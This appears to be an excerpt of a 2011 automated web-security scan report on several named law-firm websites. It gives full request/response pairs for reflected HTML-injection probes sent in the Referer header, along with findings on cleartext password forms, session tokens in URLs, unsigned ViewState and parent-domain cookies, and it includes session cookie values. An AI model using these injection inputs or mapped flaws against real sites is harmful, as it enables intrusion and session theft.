The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75416"><a>0aa9a2a2b09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /professionals.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=75416"><a>0aa9a2a2b09
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Find an Attorney or Professional</title> <meta na ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=75416"><a>0aa9a2a2b09"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6ed"><a>0d08c6799e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /publications.cfm?id=2795&action=view HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=1e6ed"><a>0d08c6799e
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Trade mark owner can object to resale of 'perfume te ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=1e6ed"><a>0d08c6799e"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c070"><a>4421a84236f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /remote_access.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=6c070"><a>4421a84236f
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: OFFICE=;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997bb"><a>c1452cc4d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /search.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=997bb"><a>c1452cc4d4
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91afd"><a>22110ca1882 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /sitemap.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=91afd"><a>22110ca1882
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605f4"><a>5f16750633f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23; Referer: http://www.google.com/search?hl=en&q=605f4"><a>5f16750633f
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A01%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D780%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:01 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.political.cov.com/login.cfm
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.political.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 16:55:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /alumni/Index.cfm HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]... <td align="left" valign="top"> <form method="post" action="alumni_authenticate.cfm" id="loginFrm">
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /about_the_firm_recognition_rankings.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP</title> <meta name="Description" content="Arnold & ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=AntonipillaiJustinS&action=view&id=420&CFID=9488352&CFTOKEN=58883300">Justin Antonipillai</a> ...[SNIP]... </em> ranked Arnold & Porter as a leading law firm for International Arbitration and Capital Markets. The publication also ranked the following lawyers as "Leading Individuals": <a href="http://www.arnoldporter.com/professionals.cfm?u=DiRosaPaolo&action=view&id=967&CFID=9488352&CFTOKEN=58883300">Paolo Di Rosa</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=9488352&CFTOKEN=58883300">Gaela Gehring Flores</a> for International Arbitration; <a href="http://www.arnoldporter.com/professionals.cfm?u=HarringtonGregory&action=view&id=946&CFID=9488352&CFTOKEN=58883300">Gregory Harrington</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=StumpfMarkH&action=view&id=116&CFID=9488352&CFTOKEN=58883300">Mark Stumpf</a> ...[SNIP]... </em> named Arnold & Porter antitrust partner <a href="http://www.arnoldporter.com/professionals.cfm?u=FeinsteinDeborahL&action=view&id=29&CFID=3285218&CFTOKEN=60209382">Deborah Feinstein</a> ...[SNIP]... </em> annual Awards Ceremony in London on June 22nd. The team, led by London partners <a href="http://www.arnoldporter.com/professionals.cfm?u=FrazerTim&action=view&id=277&CFID=2238313&CFTOKEN=85690966">Tim Frazer</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=HinchliffeSusan&action=view&id=234&CFID=2238313&CFTOKEN=85690966">Susan Hinchliffe</a> ...[SNIP]... <p>Attorney General Eric Holder presented Arnold & Porter counsel <a href="http://www.arnoldporter.com/professionals.cfm?u=PitofskyRobert&action=view&id=424&CFID=1875550&CFTOKEN=71164531">Robert Pitofsky</a> ...[SNIP]... </a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=DregerGingerR&action=view&id=5423&CFID=476026&CFTOKEN=73240865">Ginger Dreger</a> ...[SNIP]... </em> named Arnold & Porter partner <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&action=view&id=289&CFID=417833&CFTOKEN=96803455">William Baer</a> ...[SNIP]... </a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=RubelEricA&action=view&id=96&CFID=15574942&CFTOKEN=53050326">Eric Rubel</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&action=view&id=289&CFID=8038589&CFTOKEN=38448975">William Baer</a> ...[SNIP]... </a> the "Washington, DC Bankruptcy and Creditor-Debtor Rights Lawyer of the Year"; <a href="http://www.arnoldporter.com/professionals.cfm?u=GerrardMichaelB&action=view&id=189&CFID=8038589&CFTOKEN=38448975">Michael Gerrard</a> the "New York Environmental Lawyer of the Year" and <a href="http://www.arnoldporter.com/professionals.cfm?u=HawkeJohnDJr&action=view&id=716&CFID=8038589&CFTOKEN=38448975">John D. Hawke Jr.</a> ...[SNIP]... ife sciences: regulatory, compliance & competition; and product liability: mainly defendant; and was ranked as a "Leading Firm" for intellectual property and media & entertainment: publishing. <a href="http://www.arnoldporter.com/professionals.cfm?u=DoddsSmithIan&action=view&id=457&CFID=8038589&CFTOKEN=38448975">Ian Dodds-Smith</a> ...[SNIP]... </a> was ranked for life sciences and product liability; <a href="http://www.arnoldporter.com/professionals.cfm?u=TsangLincoln&action=view&id=553&CFID=8038589&CFTOKEN=38448975">Lincoln Tsang</a> was ranked for life sciences; <a href="http://www.arnoldporter.com/professionals.cfm?u=KirbyIan&action=view&id=320&CFID=8038589&CFTOKEN=38448975">Ian Kirby</a> ...[SNIP]... </a>, <a href="http://www.arnoldporter.com/professionals.cfm?u=DriverHElizabeth&action=view&id=435&CFID=8038589&CFTOKEN=38448975">Elizabeth Driver</a>, and <a href="http://www.arnoldporter.com/professionals.cfm?u=BoreJacqueline&action=view&id=799&CFID=8038589&CFTOKEN=38448975">Jacqueline Bore</a> were ranked for product liability; <a href="http://www.arnoldporter.com/professionals.cfm?u=FrazerTim&action=view&id=277&CFID=8038589&CFTOKEN=38448975">Tim Frazer</a> was ranked for competition/European Law; <a href="http://www.arnoldporter.com/professionals.cfm?u=ClintonDavisHenry&action=view&id=5083&CFID=8038589&CFTOKEN=38448975">Henry Clinton-Davis</a> was ranked for employment; and <a href="http://www.arnoldporter.com/professionals.cfm?u=WillcocksJeremy&action=view&id=378&CFID=8038589&CFTOKEN=38448975">Jeremy Willcocks</a> ...[SNIP]... </em> In terms of practice areas, the group certainly enjoys a diverse caseload, although it is in the field of investment arbitration that it earns the most significant praise." The publication named <a href="http://www.arnoldporter.com/professionals.cfm?u=DiRosaPaolo&action=view&id=967&CFID=793238&CFTOKEN=19009463">Paolo Di Rosa</a> as a "Leading Individual" for International Arbitration and also singled out <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=793238&CFTOKEN=19009463">Gaela Gehring Flores</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=KalickiJeanEngelmayer&action=view&id=254&CFID=793238&CFTOKEN=19009463">Jean Kalicki</a> ...[SNIP]... </em> 2009 named firm Chair <a href="http://www.arnoldporter.com/professionals.cfm?u=MilchThomasH&action=view&id=79&CFID=793238&CFTOKEN=19009463">Thomas Milch</a> and senior counsel <a href="http://www.arnoldporter.com/professionals.cfm?u=GerrardMichaelB&action=view&id=189&CFID=793238&CFTOKEN=19009463">Michael Gerrard</a> on its "Most Highly Regarded Individuals - Global" list. Arnold & Porter was the only firm to have two individuals ranked on the list of ten international lawyers. Partners <a href="http://www.arnoldporter.com/professionals.cfm?u=BilesBlakeA&action=view&id=8&CFID=793238&CFTOKEN=19009463">Blake Biles</a> ...[SNIP]... </a>, <a href="http://www.arnoldporter.com/professionals.cfm?u=MartelJonathan&action=view&id=74&CFID=793238&CFTOKEN=19009463">Jonathan Martel</a>, <a href="http://www.arnoldporter.com/professionals.cfm?u=NardiKarenJ&action=view&id=5263&CFID=793238&CFTOKEN=19009463">Karen Nardi</a>, and <a href="http://www.arnoldporter.com/professionals.cfm?u=NorrisTrentonH&action=view&id=5056&CFID=793238&CFTOKEN=19009463">Trenton Norris</a> ...[SNIP]... ual property, media and entertainment, and pharmaceuticals and biotechnology); and transport (rail). The firm was also ranked as a "US firm in London" for Dual US/UK law capability: 25-50 fee-earners. <a href="http://www.arnoldporter.com/professionals.cfm?u=DoddsSmithIan&action=view&id=457&CFID=793238&CFTOKEN=19009463">Ian Dodds-Smith</a> was named a "leading individual" for product liability and pharmaceuticals & biotechnology; and <a href="http://www.arnoldporter.com/professionals.cfm?u=KirbyIan&action=view&id=320&CFID=793238&CFTOKEN=19009463">Ian Kirby</a> ...[SNIP]... </em> "Top Washington Lawyers" feature, published in its September 18-24, 2009 edition. <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=793238&CFTOKEN=19009463">Gaela Gehring Flores</a> ...[SNIP]... </a>; <a href="http://www.arnoldporter.com/professionals.cfm?u=KahnSarahE&action=view&id=99&CFID=793238&CFTOKEN=19009463">Sarah Kahn</a> was named a winner for Corporate M&A; <a href="http://www.arnoldporter.com/professionals.cfm?u=GerschDavidP&action=view&id=37&CFID=793238&CFTOKEN=19009463">David Gersch</a> ...[SNIP]... </a> was named a winner for Technology Transactions; <a href="http://www.arnoldporter.com/professionals.cfm?u=RifkindAmyB&action=view&id=231&CFID=793238&CFTOKEN=19009463">Amy Rifkind</a> was named as a winner for Real Estate Transactions; and <a href="http://www.arnoldporter.com/professionals.cfm?u=SotskyLester&action=view&id=111&CFID=793238&CFTOKEN=19009463">Les Sotsky</a> ...[SNIP]... <p><a href="http://www.arnoldporter.com/professionals.cfm?u=FeinsteinDeborahL&action=view&id=29&CFID=793238&CFTOKEN=19009463">Deborah Feinstein</a> ...[SNIP]... </a> (Brussels) and <a href="http://www.arnoldporter.com/professionals.cfm?u=VanKerckhoveMarleen&action=view&id=616&CFID=793238&CFTOKEN=19009463">Marleen Van Kerckhove</a> ...[SNIP]... <p>The New York City Bar Association's (NYCBA) has named <a href="http://www.arnoldporter.com/professionals.cfm?u=FucciFrederickR&action=view&id=4980&CFID=793238&CFTOKEN=19009463">Frederick R. Fucci</a> ...[SNIP]... </em> 2009 list: <a href="http://www.arnoldporter.com/professionals.cfm?u=GargantaAngelA&action=view&id=5055&CFID=793238&CFTOKEN=19009463">Angel Garganta</a> (business litigation, civil litigation defense, and banking), <a href="http://www.arnoldporter.com/professionals.cfm?u=NardiKarenJ&action=view&id=5263&CFID=793238&CFTOKEN=19009463">Karen Nardi</a> (environmental), <a href="http://www.arnoldporter.com/professionals.cfm?u=NorrisTrentonH&action=view&id=5056&CFID=793238&CFTOKEN=19009463">Trenton Norris</a> ...[SNIP]... </a> (intellectual property litigation, civil rights/first amendment, and alternative dispute resolution). <a href="http://www.arnoldporter.com/professionals.cfm?u=ChaninRachelL&action=view&id=5095&CFID=793238&CFTOKEN=19009463">Rachel Chanin</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=HawkeJohnDJr&action=view&id=716&CFID=793238&CFTOKEN=19009463">John D. Hawke, Jr.</a> ...[SNIP]... <p>The Internal Revenue Service's Advisory Committee on Tax Exempt and Government Entities (ACT) named <a href="http://www.arnoldporter.com/professionals.cfm?u=JosephJamesP&action=view&id=53&CFID=793238&CFTOKEN=19009463">James Joseph</a> ...[SNIP]... p>Arnold & Porter was recommended in England for IP: commercial IP and IP: non-patent litigation; was recommended in Washington, DC for IP; and was recognized in England for IP: patent litigation. <a href="http://www.arnoldporter.com/professionals.cfm?u=DickinsonRichard&action=view&id=5050&CFID=793238&CFTOKEN=19009463">Richard Dickinson</a> was recognized for IP: commercial IP (England); <a href="http://www.arnoldporter.com/professionals.cfm?u=KirbyIan&action=view&id=320&CFID=793238&CFTOKEN=19009463">Ian Kirby</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=JohnstonRonaldL&action=view&id=306&CFID=793238&CFTOKEN=19009463">Ronald Johnston</a> ...[SNIP]... <p>The National Asian Pacific American Bar Association (NAPABA) named San Francisco partner <a href="http://www.arnoldporter.com/professionals.cfm?u=AgarwalMonty&action=view&id=5058&CFID=793238&CFTOKEN=19009463">Monty Agarwal</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=MorrisSean&action=view&id=263&CFID=793238&CFTOKEN=19009463">Sean Morris</a> ...[SNIP]... <p>The Executive Council of the Banking Law Committee of the Federal Bar Association awarded <a href="http://www.arnoldporter.com/attorneys.cfm?u=HawkeJohnDJr&action=view&id=716&CFID=6662351&CFTOKEN=25960794">John D. Hawke, Jr.</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=ColleyMarkD&action=view&id=913&CFID=793238&CFTOKEN=19009463">Mark Colley</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=GoodwinMichaelD&action=view&id=163&CFID=793238&CFTOKEN=19009463">Michael Goodwin</a> ...[SNIP]... </em>awarded partner <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&action=view&id=289&CFID=793238&CFTOKEN=19009463">William Baer</a> ...[SNIP]... </em>named <a href="http://www.arnoldporter.com/professionals.cfm?u=GarrettRobertAlan&action=view&id=36&CFID=793238&CFTOKEN=19009463">Robert Garrett</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=BlackburnJamesS&action=view&id=301&CFID=793238&CFTOKEN=19009463">James Blackburn</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=MacdonaldTimothyR&action=view&id=279&CFID=793238&CFTOKEN=19009463">Timothy Macdonald</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/attorneys.cfm?u=QuinnJohnJ&action=view&id=225&CFID=6160598&CFTOKEN=81825356">John "Jack" Quinn</a> ...[SNIP]...
5. ASP.NET ViewState without MAC enabledpreviousnext There are 10 instances of this issue:
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.
You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.cov.com/zh-CN/offices/office.aspx?office=64">here</a>.</h2> </body></html>
<!DOCTYPE HTML PUBLIC "-/ ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTM2OTAxODQ2ZGQ=" /> ...[SNIP]...
6. Cookie scoped to parent domainpreviousnext There are 26 instances of this issue:
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dc HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Set-Cookie: CFTOKEN=35971701;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A41%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A40%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
